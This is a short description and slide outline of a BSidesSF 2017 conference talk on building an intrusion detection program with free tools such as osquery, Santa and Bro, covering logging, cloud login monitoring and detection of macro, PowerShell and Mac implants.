Building an Effective Intrusion Detection Program

Explore effective intrusion detection strategies in this BSidesSF 2017 conference talk. Learn how to build a robust program using affordable or free tools, focusing on cloud applications, endpoints, and network security monitoring. Discover techniques to identify and mitigate modern breaches, which often go undetected for extended periods. Compare recent high-profile security incidents and learn timely detection methods. Gain insights into logging best practices, Network Security Monitoring (NSM), and platform-specific tools for Mac and Windows environments. Examine real-world examples of cloud logging, including Google and Dropbox logins, as well as detecting Windows Office Macro implants and PowerShell threats. Investigate Mac implants using osquery and Santa, and explore network monitoring with Bro. Enhance your organization's security posture by implementing crowd-sourced incident response techniques and leveraging the power of effective intrusion detection.

Intro
Assumptions
Social stuff: Be nice.
Tool talk: Logging
Re: Logging Log everything
Tool talk: NSM
3. Tool talk: Macs
3. Tool talk: Windows
Examples: Cloud logging. Google Logins.
4. Examples: Cloud logging. Dropbox logins. Example query
Dropbox logins cont.
4. Examples: Windows Office Macro Implants
Skip a few steps...
End result
4. Examples: Windows Powershell
Windows PS cont
4. Examples: Mac implants wlosquery
Mac & osquery cont: (edited for readability)
4. Examples: Mac implants w/Santa
4. Examples: Network monitoring Bro FTW
Q&A Questions? Comments?